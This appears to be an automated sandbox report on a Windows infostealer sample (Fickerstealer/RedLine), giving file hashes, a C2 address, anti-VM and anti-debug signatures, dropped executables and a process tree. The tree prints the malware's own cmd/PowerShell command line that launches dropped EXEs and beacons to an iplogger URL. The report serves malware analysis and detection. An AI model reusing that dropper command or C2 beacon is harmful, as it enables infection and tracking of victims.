Analysis
- max time kernel: 168s
- max time network: 180s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220112
- submitted: 15-02-2022 12:04
Static task: static1
Behavioral task: behavioral1
- Sample: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
- Resource: win10v2004-en-20220112
General
- Target: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
- Size: 3.0MB
- MD5: c0786eaf915a205bb066e598e5418c6b
- SHA1: 8440f9408fa74c88fad34977ca1ac639c1f5ef2e
- SHA256: 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed
- SHA512: 4ecad942db3dc06da1c6c158e850eb7460bd4e3ba51e6abb304fec81cbd27aff475e9e3df37043de0dbc4f757b03a1588eb13c560a687c8d039a41bc6667c2c4
Malware Config
Extracted
fickerstealer
game2030.site:80
Signatures
-
Fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule
behavioral2/memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp family_redline
-
.NET Reactor protector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule
behavioral2/memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp net_reactor
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
pid process
2592 MMP1.exe
2252 Ww.exe
3420 MMP1.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ww.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ww.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid process
1224 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
-
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\Ww.exe themida
behavioral2/memory/2252-148-0x0000000000BC0000-0x0000000001324000-memory.dmp themida
-
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ww.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc
53 api.ipify.org
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
pid process
2252 Ww.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description pid process target process
PID 2592 set thread context of 3420 2592 MMP1.exe MMP1.exe
-
Drops file in Windows directory 3 IoCs
Processes:
description ioc process
File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe
File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe
-
Modifies data under HKEY_USERS 49 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid process
2252 Ww.exe
2252 Ww.exe
1800 powershell.exe
1800 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
description pid process
Token: SeDebugPrivilege 1800 powershell.exe
Token: SeSecurityPrivilege 3868 TiWorker.exe
Token: SeRestorePrivilege 3868 TiWorker.exe
Token: SeBackupPrivilege 3868 TiWorker.exe
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
description pid process target process
PID 1224 wrote to memory of 2012 1224 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe
PID 2012 wrote to memory of 2592 2012 cmd.exe MMP1.exe
PID 2012 wrote to memory of 2252 2012 cmd.exe Ww.exe
PID 2592 wrote to memory of 3420 2592 MMP1.exe MMP1.exe
PID 2012 wrote to memory of 1800 2012 cmd.exe powershell.exe
Processes
depth 1: C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
command line: "C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
  depth 2: C:\Windows\SysWOW64\cmd.exe
  command line: "cmd" /c start "" "MMP1.exe" & start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
  - Suspicious use of WriteProcessMemory
    depth 3: C:\Users\Admin\AppData\Local\Temp\MMP1.exe
    command line: "MMP1.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
      depth 4: C:\Users\Admin\AppData\Local\Temp\MMP1.exe
      command line: "MMP1.exe"
      - Executes dropped EXE
    depth 3: C:\Users\Admin\AppData\Local\Temp\Ww.exe
    command line: "Ww.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    depth 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
depth 1: C:\Windows\system32\MusNotifyIcon.exe
command line: %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
- Checks processor information in registry
depth 1: C:\Windows\System32\svchost.exe
command line: C:\Windows\System32\svchost.exe -k NetworkService -p
- Drops file in Windows directory
- Modifies data under HKEY_USERS
depth 1: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
command line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exe
MD5: 5ca7fa3d1d1efdffada437068eccbd4e
SHA1: 0204b4435a79e1d3ce325706801ba3687e86dccf
SHA256: 8eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA512: 15ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
C:\Users\Admin\AppData\Local\Temp\Ww.exe
MD5: e58d740f792702828c45ebfb73c8a95d
SHA1: 8eeb2a9357aa57affb56cc938342d3dd7bb6f0c9
SHA256: ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10
SHA512: 9152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8
-
C:\Users\Admin\AppData\Local\Temp\nsa7ECE.tmp\JHILLSVZFH1MBP.dll
MD5: 293165db1e46070410b4209519e67494
SHA1: 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA256: 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA512: 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19